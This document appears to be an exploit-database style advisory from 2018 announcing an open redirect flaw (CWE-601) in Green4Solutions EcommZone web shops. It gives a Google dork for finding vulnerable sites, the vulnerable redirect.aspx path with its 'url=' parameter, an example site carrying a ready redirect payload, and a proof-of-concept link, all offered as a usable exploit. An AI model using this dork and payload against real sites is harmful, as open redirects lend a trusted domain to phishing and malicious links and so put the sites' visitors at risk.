################################################################################################# # Exploit Title : Provided By Green4Solutions EcommZone Open Redirection Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 21/06/2018 # Vendor Homepage : green4solutions.com # Tested On : Windows # Category : WebApps # Exploit Risk : Medium # CWE : CWE-601 [ URL Redirection to Untrusted Site ('Open Redirect') ] ################################################################################################# # Google Dork : inurl:''/lz/EPLIVE/'' # Exploit : /lz/EPLIVE/00AUH7/0646f3b55334d3a52df2a6cf85c23ea123/actions/redirect.aspx?url= ################################################################################################# # Example Sites : eta.ecommzone.com/lz/EPLIVE/00AUH7/0646f3b55334d3a52df2a6cf85c23ea123/actions/redirect.aspx?url=https://www.DOMAINADDRESS.gov + Proof of Concept => archive.is/VISf4 ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################